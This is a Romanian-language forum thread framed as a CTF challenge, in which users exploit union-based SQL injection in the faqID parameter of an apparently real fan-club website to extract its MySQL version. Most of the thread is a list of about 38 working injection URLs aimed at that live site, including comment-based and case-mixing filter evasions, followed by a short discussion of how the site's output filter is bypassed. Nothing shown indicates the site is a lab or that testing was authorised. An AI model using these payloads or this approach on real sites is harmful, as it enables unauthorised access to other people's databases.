Jump to content
denjacker

SQL Injection challenge

By denjacker, in Challenges (CTF)

Recommended Posts

denjacker Newbie

denjacker

Posted
Posted (edited)

Se da urmatorul link:

https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50

images?q=tbn:ANd9GcRfnjoOIArIeYr7MTxdMvHlWwcg1q0JbJXuRza78DJ6bMZgfXQ&t=1&usg=__exqVw3tcnkelaiMSCnD0hn7KBjo=

INDICII: MySql, Union Based!

Scopul acestui challenge este sa gasiti "calea" prin care sa extrageti versiunea bazei de date. Atat.. doar versiunea ! :)

Se poate rezolva si blind dar eu vreau sa-l faceti UNION based..

Mentionati cum ati procedat! Puneti screenshot-uri si tot ce trebuie pentru a dovedii ca ati reusit.

Dificultate: Pretty damn hard!

Successsssssss >:D<

Edited by denjacker
Paul4games Newbie

Paul4games

Posted
Posted

Pun cu MySql CHAR() si am incercat si cu @@version dar asta se intampla doar cand pun -inainte de id daca nu pun nu imi apare nimic iar daca nu pun cu CHAR sau intre ghilimele imi da eroare:|......si a zis ca nu blind

denjacker Newbie

denjacker

Posted
  • Author
Posted

Lista cu raspunsurile celor care au dat PM + alte variante posibile de raspuns:


Plitvix      --- https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50 and 1=10 union all select quote(version())-- -
tdxev:       --- http://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50 and 1=10 union all select concat(char(39), version(), char(39))-- 
SirGod:      --- https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=-50/**/union/**/select+/*!50022+1*//*
michee :     --- https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=-50/**/union/**/select/**/if(@@version=5,5,4)--
tdxev:       --- http://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+hex(hex(version()))--
vogelstrauß: --- http://jonasbrothersfanclub.com//help/faqAnswer.php?faqID=50 and 1=3 union select (substring(version(),1,3))--
vogelstrauß: --- http://jonasbrothersfanclub.com//help/faqAnswer.php?faqID=50 and 1=3 union select cast(version() as date)--
TinKode:     --- http://jonasbrothersfanclub.com//help/faqAnswer.php?faqID=-50/**/aNd/**/(1)=(2)/**/unIOn/*!*/seLEct/**/quOTe(vERSion())--+--/*
doi:         --- https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50/**/and/**/1=2/*AMD*/union/**/all/**/select/**/ascii(mid(@@version,1,1))--

   daemien --> alte variante
------------------------------------------

1]  https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+ASCII(@@version)--
2]  https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+ORD(version())--
3]  https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+FIELD(5,version())-- 
4]  https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+FORMAT(version(),1)--
5]  https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+CAST(version() AS UNSIGNED)--
6]  https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+ABS(version())--
7]  https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+CEILING(version())--
8]  https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+FLOOR(@@version)--
9]  https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+MOD(@@version,5)--
10] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+POW(@@version,1)--
11] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+POWER(@@version,1)--
12] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+ROUND(@@version,1)--
13] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+TRUNCATE(@@version,1)--
14] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+SQRT(@@version*version())--
15] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+CAST(@@version+AS+UNSIGNED)=5--
16] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+(@@version*2)/2--
17] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+(@@version-5)+IS+NULL--
18] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+BIN(version())--
19] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+(@@version-4)+IS+NOT+NULL--
20] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+@@version+BETWEEN+5+AND+10--
21] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+@@version+NOT+BETWEEN+0+AND+4--
22] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+LEAST(version(),99999)--
23] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+CAST(LEAST(@@version,9999)+as+SIGNED)--
24] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+CASE+WHEN+5>=(@@VERSION*2)/2+THEN+5+ELSE+4+END--
25] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+IF(5<=@@version,5,4)--
26] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+LOCATE(5,@@version)--
27] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+OCT(@@version)--
28] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+POSITION(5+IN+@@version)--
29] https://jonasbrothersfanclub.com/help/faqAnswer.php?faqID=50+and+1=0+union+select+REVERSE(@@version*2/2)--



daca mai aveam tigari in seara aia mai gaseam :))

tdxev Newbie

tdxev

Posted
Posted
poate sa-mi explice si mie careva de ce a folosit quote()? Sa mor daca ma prind......

Din cate am vazut eu acolo filtru se aplica in php inainte de afisare dupa extragerea datelor din baza de date.

De fitru trece ori ce string care este cuprins in ghilimele simple si care nu are in string gilimele simple, si ori ce string care este format doar din numere.

Varianta concat(char(39), version(), char(39)) am scos-o dupa ce am aflat de varianta cu quote().

Stiu ca nu prea are logica folosirea functiei quote() dar cel mai important este rezultatul.

michee Newbie

michee

Posted
Posted
Din cate am vazut eu acolo filtru se aplica in php inainte de afisare dupa extragerea datelor din baza de date.

De fitru trece ori ce string care este cuprins in ghilimele simple si care nu are in string gilimele simple, si ori ce string care este format doar din numere.

Varianta concat(char(39), version(), char(39)) am scos-o dupa ce am aflat de varianta cu quote().

Stiu ca nu prea are logica folosirea functiei quote() dar cel mai important este rezultatul.

Si care-i logica lu ala de-a programat de-a pus un asemenea filtru?si ce anume v-a facut sa va ganditi la filtrul asta?

tdxev Newbie

tdxev

Posted
Posted

Pai sincer nu cred ca este facut intentionat ca filtru asa a iesit probabil ca urmarea altceva nu se gandea la SQLi.

Eu am vazut ca returneaza doar numere si am cautat o functie metoda care sa returneze un string ca numere, singura functie fiind hex (hex ("str")).

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...